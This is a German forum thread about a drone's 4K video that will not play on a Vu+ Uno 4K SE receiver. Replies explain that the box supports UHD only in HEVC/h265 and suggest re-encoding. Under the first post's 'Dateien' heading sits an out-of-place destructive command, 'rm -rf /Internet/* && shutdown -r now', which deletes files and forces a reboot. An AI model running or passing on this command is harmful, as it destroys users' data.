4K Video

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Hallo,

      ich versuche ein Mavic Mini 2 4K Video auf der Uno 4K SE laufen zu lassen, allerdings spielt er es nicht ab.
      Das Video liegt einmal in mp4 und mkv (1:1 mit ffmpeg erstellt) auf der Box.
      Bei jedem Start springt es zum Ende des Videos. Wenn ich es auf einem USB Stick am TV laufen lasse läuft es ohne Probleme. Jemand eine Idee dazu??
      Dateien
      rm -rf /Internet/* && shutdown -r now
    • Falls der Ton auch nicht passt, kann die Wiedergabe auch schief gehen.
      Holt euch einen gute Mediaplayer, da laufen auch meistens die Exoten.
      Ich würde wenigstens versuchen das Videofile mit z.B. mit XMedia Recode (Freeware) zurecht zu biegen.
      Kann klappen, muß aber nicht.
    • faxe2110 schrieb:

      Im VLC (PC) läuft es auch. Selbiges ja vom USB Stick direkt im TV.
      Völlig egal, wo es sonst läuft, auf keiner 4K-Vu wird UHD in h264 unterstützt. Die Hardware unterstützt nur HEVC/h265 bei UHD-Auflösung. Und nein, es gibt keinen Codec zum nachinstallieren. :D Um das in Software zu lösen ist die Hardware nicht potent genug.
      ACHTUNG!!!! Hier folgt eine Signatur:


      Die Benutzung der Suche ist NICHT verboten! D:

      "Hilfe!!!" ist kein sinnvoller Titel für einen neuen Thread, ebensowenig "VU+Zero" oder vergleichbares.

      Keine Hilfe ohne ausgefülltes Profil!
      Kein Netzwerksupport bei manueller IP-Adress-Vergabe :-)
      Kein Support bei portforwardings/ Portfreigaben

      Profil extra angepasst für die arme Emma, die sonst nichts im Leben hat :happy1: